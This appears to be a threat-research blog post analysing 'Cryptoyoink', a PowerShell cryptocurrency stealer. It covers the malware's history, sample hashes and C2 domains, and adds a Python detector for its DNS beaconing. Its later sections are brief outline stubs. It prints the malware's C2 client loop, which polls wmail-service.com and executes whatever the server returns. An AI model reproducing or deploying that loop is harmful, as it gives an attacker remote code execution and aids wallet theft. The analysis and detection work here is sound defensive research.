Recently, I’ve been tracking the evolution of a piece of malware that I’ve started to call Cryptoyoink (kudos to @alicynx for the name!), a multi-stage cryptostealer written in PowerShell. Cryptoyoink isn’t particularly innovative, but it takes advantage of common blind spots in traditional antimalware, and the author(s) behind it have been refining their operations over at least the past four months.

Xavier Mertens first posted a deep-dive on this cryptostealer on the SANS ISC blog on June 22nd, and at the time VirusTotal showed that only 1 out of 53 vendors flagged it as malicious.

What Xavier didn’t cover in depth is how Cryptoyoink’s C2 works, which piqued my interest after I noticed that Cryptoyoink’s current C2 domains rank in the top 100k most popular domains according to Cloudflare Radar, and around the top 200k most popular domains according to Cisco Umbrella. In total, Cryptoyoink’s C2 accounts for over 500 million DNS requests per week.

So, what does Cryptoyoink do? How has Cryptoyoink’s C2 changed over time? Is this a massive, underreported threat, or is something else generating so much traffic?

Perhaps most importantly, can I ruin Cryptoyoink’s operator’s day?

Payload: Cryptoyoink’s Cryptostealer

As mentioned prior, I’m not the first person to discover the cryptostealer I’m calling Cryptoyoink. The first mention of this malware that I can find was on malware removal forums starting in mid-May 2022, such as this thread reporting a risky connection to wmail-service.com.

The first deep dive into Cryptoyoink was published by Xavier Mertens on the SANS ISC blog on June 22nd. This first publicly-known version had a very low score on VirusTotal at the time (1/53) and does the following:

  • Collects details about the infected computer, such as user information and antivirus status.
  • Searches for cryptocurrency extensions (e.g. wallets) in the Chrome, Brave, and Edge browsers.
  • Reports user data and relevant extensions to wmail-endpoint.com over HTTP.
  • Runs any commands returned in wmail-endpoint.com’s response; presumably these are commands to steal sensitive information.

This sample also included another PowerShell script - commented out - that would monitor the clipboard for wallet addresses.

Samples and references for this section:

  • First deeper dive: xme (Xavier Mertens) at SANS ISC.
  • Original sample: https://malshare.com/sample.php?action=detail&hash=0bbce92b547f0e99a37636b090cb05d9633cc05e1ce876e0076ca32dc4c901c4
  • Jul 5 sample: https://malshare.com/sample.php?action=detail&hash=681acd96bbeda35fedce63fe89277fea39cb6b2dc213daf668a0e7b386594832
  • Sept 26 sample: https://malshare.com/sample.php?action=detail&hash=f5653badab43304c265fd3a91966b29e703c60d0753ecf75b85e8c6aaf96554f
  • VirusTotal (original sample): https://www.virustotal.com/gui/file/0bbce92b547f0e99a37636b090cb05d9633cc05e1ce876e0076ca32dc4c901c4
  • Joe Sandbox (original sample): https://www.joesandbox.com/analysis/649858/0/html

Cryptoyoink’s C2 Client

Original C2 Client (May/June)

First user report I can find: https://forums.malwarebytes.com/topic/286466-wmail-servicecom-riskware-blocked-powershellexe/

User reports in June: no DGA, simple invocation, script hidden in drivers (noisy). https://www.malwareremoval.com/forum/viewtopic.php?f=11&t=66857

# Original C2 client loop: poll a single hard-coded URL forever.
while ($true) {
  try {
    # Fetch the next task from the C2; the GUID path and the 'v=' tag identify this build/campaign.
    $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'
    if ($r -ne '') {
      # Any non-empty response body is executed as PowerShell in a background job.
      Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
    }
  }
  catch {} # Network errors are swallowed so the loop never dies.
  Start-Sleep 2 # Fixed 2-second beacon interval: noisy, and easy to spot in DNS/proxy logs.
}

Automated analysis from around May 23 on Hybrid Analysis: https://hybrid-analysis.com/sample/943f61f580ca864dc850e019f7289895b3f9b0be2c146b979b6655f01569b1ea/628b8afb4133947b874bfc14
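As an added detection example (not code from the original post or from the malware itself), here is a Python check that scans DNS query logs for hosts resolving the two C2 domains named above and flags clients whose query gaps match the client’s fixed 2-second polling loop. The log format and the sample lines are constructed for the example.

```python
import re
from collections import defaultdict
from statistics import median

# C2 domains named in the write-up.
C2_DOMAINS = {"wmail-service.com", "wmail-endpoint.com"}
# The original client sleeps 2 s between polls, so beacon gaps cluster tightly.
POLL_SECONDS = 2.0

# Constructed sample DNS log: "<epoch> <client ip> <queried name>". Not real traffic.
SAMPLE_LOG = """\
1655900000 10.0.0.5 wmail-service.com
1655900002 10.0.0.5 wmail-service.com
1655900004 10.0.0.5 wmail-service.com
1655900006 10.0.0.5 wmail-service.com
1655900001 10.0.0.9 example.com
1655900030 10.0.0.9 wmail-endpoint.com
1655900003 10.0.0.7 cdn.wmail-service.com
1655900005 10.0.0.7 cdn.wmail-service.com
"""
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)$")

def matches_c2(name):
    """True for a C2 domain or any subdomain of one; case and trailing dot ignored."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in C2_DOMAINS)

def parse_log(text):
    """Yield (timestamp, client, name) for well-formed lines; skip malformed ones."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)

def c2_contacts(text):
    """Every client that resolved a C2 name at all; one lookup is already worth triage."""
    return {client for _, client, name in parse_log(text) if matches_c2(name)}

def find_beaconing_clients(text, min_queries=3, tolerance=1.0):
    """Map client -> median gap for clients whose C2 lookups look like the 2 s poll loop."""
    per_client = defaultdict(list)
    for ts, client, name in parse_log(text):
        if matches_c2(name):
            per_client[client].append(ts)
    hits = {}
    for client, stamps in per_client.items():
        if len(stamps) < min_queries:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gap = median(b - a for a, b in zip(stamps, stamps[1:]))
        if abs(gap - POLL_SECONDS) <= tolerance:
            hits[client] = gap
    return hits
```

Resolver caching will stretch the observed DNS gaps well beyond 2 seconds, so on real data run the same interval check over proxy or firewall logs of the HTTP requests instead.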

C2 Client Adds a DGA

User reports in July: new DGA.

C2 Client Goes Fileless

Here’s how the new version gets installed (registry, XOR, run), and how the new C2 DGA works.

Oh, by the way: the operator didn’t register nine of its C2 domains, so I did. Tune in next time…

Ruining the Day

And this is why your DGA needs to be better, kids.